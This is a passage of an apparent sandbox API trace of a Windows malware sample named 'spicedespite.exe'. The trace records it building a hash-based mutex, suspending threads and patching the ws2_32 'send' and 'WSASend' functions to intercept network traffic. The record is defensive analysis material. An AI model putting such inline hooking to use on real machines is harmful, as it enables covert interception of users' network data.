(lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0172.130] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0172.131] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0172.131] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0172.131] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0xdaf9a4 | out: lpflOldProtect=0xdaf9a4*=0x40) returned 1 [0172.131] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0xdaf9a4 | out: lpflOldProtect=0xdaf9a4*=0x4) returned 1 [0172.132] VirtualQuery (in: lpAddress=0x130016, lpBuffer=0xdaf99c, dwLength=0x1c | out: lpBuffer=0xdaf99c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0172.132] GetProcessHeap () returned 0x4f0000 [0172.132] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x364) returned 0x510570 [0172.132] RtlMoveMemory (in: Destination=0x510570, Source=0x130016, Length=0x363 | out: Destination=0x510570) [0172.132] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x130016) returned 0x0 [0172.132] GetCurrentProcessId () returned 0x58c [0172.132] GetProcessHeap () returned 0x4f0000 [0172.132] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x105) returned 0x5108e0 [0172.132] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5108e0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\spicedespite.exe" (normalized: "c:\\program files\\common files\\spicedespite.exe")) returned 0x2e [0172.132] GetProcessHeap () returned 0x4f0000 [0172.132] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x105) returned 0x5109f0 [0172.132] GetCurrentProcessId () returned 0x58c [0172.132] wsprintfA (in: param_1=0x5109f0, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Common Files\\spicedespite.exe37084212414203") returned 60 [0172.132] CryptAcquireContextA (in: phProv=0xdaf9a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xdaf9a0*=0x510b40) returned 1 [0172.193] CryptCreateHash (in: hProv=0x510b40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xdaf9a4 | out: phHash=0xdaf9a4) returned 1 [0172.193] lstrlenA (lpString="C:\\Program Files\\Common Files\\spicedespite.exe37084212414203") returned 60 [0172.193] CryptHashData (hHash=0x511450, pbData=0x5109f0, dwDataLen=0x3c, dwFlags=0x0) returned 1 [0172.193] CryptGetHashParam (in: hHash=0x511450, dwParam=0x2, pbData=0xdaf990, pdwDataLen=0xdaf9a8, dwFlags=0x0 | out: pbData=0xdaf990, pdwDataLen=0xdaf9a8) returned 1 [0172.194] wsprintfA (in: param_1=0x5109f0, param_2="%02X" | out: param_1="FE") returned 2 [0172.194] wsprintfA (in: param_1=0x5109f2, param_2="%02X" | out: param_1="CD") returned 2 [0172.194] wsprintfA (in: param_1=0x5109f4, param_2="%02X" | out: param_1="5D") returned 2 [0172.194] wsprintfA (in: param_1=0x5109f6, param_2="%02X" | out: param_1="15") returned 2 [0172.194] wsprintfA (in: param_1=0x5109f8, param_2="%02X" | out: param_1="89") returned 2 [0172.194] wsprintfA (in: param_1=0x5109fa, param_2="%02X" | out: param_1="AE") returned 2 [0172.194] wsprintfA (in: param_1=0x5109fc, param_2="%02X" | out: param_1="11") returned 2 [0172.194] wsprintfA (in: param_1=0x5109fe, param_2="%02X" | out: param_1="B0") returned 2 [0172.194] wsprintfA (in: param_1=0x510a00, param_2="%02X" | out: param_1="AC") returned 2 [0172.194] wsprintfA (in: param_1=0x510a02, param_2="%02X" | out: param_1="A4") returned 2 [0172.194] wsprintfA (in: param_1=0x510a04, param_2="%02X" | out: param_1="71") returned 2 [0172.194] wsprintfA (in: param_1=0x510a06, param_2="%02X" | out: param_1="1C") returned 2 [0172.194] wsprintfA (in: param_1=0x510a08, param_2="%02X" | out: param_1="FC") returned 2 [0172.194] wsprintfA (in: param_1=0x510a0a, param_2="%02X" | out: param_1="8A") returned 2 [0172.194] wsprintfA (in: param_1=0x510a0c, param_2="%02X" | out: param_1="A3") returned 2 [0172.194] wsprintfA (in: param_1=0x510a0e, param_2="%02X" | out: param_1="C8") returned 2 [0172.194] CryptDestroyHash (hHash=0x511450) returned 1 [0172.194] CryptReleaseContext (hProv=0x510b40, dwFlags=0x0) returned 1 [0172.194] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FECD5D1589AE11B0ACA4711CFC8AA3C8") returned 0x80 [0172.194] GetLastError () returned 0x0 [0172.194] Sleep (dwMilliseconds=0x1f4) [0172.701] GetCurrentProcessId () returned 0x58c [0172.701] GetCurrentThreadId () returned 0xb44 [0172.701] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0172.703] Thread32First (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.703] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.704] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.704] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.704] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.704] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.705] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.705] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.705] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.706] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.706] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.706] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.706] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.707] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.707] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.707] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.707] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.708] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.708] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.708] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.709] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.709] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.709] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.709] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.710] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.710] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.710] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.711] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.711] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.711] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.711] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.712] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.712] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.712] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.712] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.713] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.713] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.713] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.714] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.714] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.714] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.714] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.715] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.715] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.715] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.716] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.716] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.716] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.716] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.717] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.717] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.717] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.717] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.718] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.718] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.718] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.719] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.719] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.719] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.719] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.720] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.720] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.720] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.720] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.721] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.721] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.721] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.722] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.722] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.722] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.722] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.723] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.723] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.723] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.724] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.724] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.724] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.724] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.725] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.725] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.725] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.725] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.726] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.726] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.726] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.727] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.727] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.727] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.727] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.728] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.728] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.728] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.729] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.729] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.729] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.729] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.730] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.730] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.730] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.730] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.731] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.731] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.731] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.732] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.732] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.732] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.733] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.733] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.733] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.733] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.734] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.734] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.734] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.734] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.735] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.735] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.735] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.736] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.736] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.736] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.736] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.737] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.737] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.737] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.738] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.738] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.738] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.738] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.739] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.739] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.739] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.740] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.740] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.740] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.740] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.741] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.741] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.741] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.742] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.742] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.742] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.742] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.743] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.743] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.743] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.743] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.744] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.744] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.744] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.745] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.745] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.745] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.745] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.746] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.746] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.746] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.747] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.747] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.747] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.747] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.748] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.748] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.748] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.748] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.749] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.749] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.749] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.750] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.750] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.750] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.750] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.751] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.751] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.751] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.752] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.752] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.752] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.752] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.753] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.753] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.753] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.753] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.754] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.754] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.754] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.755] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.755] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.755] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.755] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.756] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.756] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.756] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.756] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.757] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.757] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.757] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.758] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.758] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.758] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.758] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.759] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.759] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.759] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.759] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.760] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.760] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.760] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.761] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.761] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.761] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.761] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.762] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.762] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.762] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.762] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.763] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.763] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.764] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.764] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.764] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.764] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.765] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.765] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.765] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.766] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.766] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.766] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.766] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.767] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.767] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.767] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.768] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.768] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.768] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.768] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.769] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.769] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.769] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.769] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.770] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.770] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.770] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.771] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.771] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.771] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.771] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.772] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.772] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.772] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.772] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.790] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x488) returned 0x8c [0172.790] SuspendThread (hThread=0x8c) returned 0x0 [0172.816] CloseHandle (hObject=0x8c) returned 1 [0172.817] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a4) returned 0x8c [0172.817] SuspendThread (hThread=0x8c) returned 0x0 [0172.817] CloseHandle (hObject=0x8c) returned 1 [0172.839] CloseHandle (hObject=0x88) returned 1 [0172.839] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0172.839] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0172.839] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0172.839] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x130000 [0172.840] RtlMoveMemory (in: Destination=0x130000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x130000) [0172.840] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0172.845] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0172.845] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0172.845] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0172.846] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x140000 [0172.846] RtlMoveMemory (in: Destination=0x140000, Source=0x75bc4406, Length=0x5 | out: Destination=0x140000) [0172.846] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0172.850] GetCurrentProcessId () returned 0x58c [0172.851] GetCurrentThreadId () returned 0xb44 [0172.851] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0172.852] Thread32First (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.852] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.853] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.853] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.853] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.854] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.854] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.854] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.854] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.855] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.855] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.855] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.856] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.856] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.856] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.857] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.858] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.858] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.858] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.858] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.859] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.859] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.859] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.860] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.860] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.860] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.860] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.861] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.861] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.861] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.861] Thread32Next (hSnapshot=0x88, lpte=0xdaf994) returned 1 [0172.862] Thread32Next (hSnapshot=0x88, 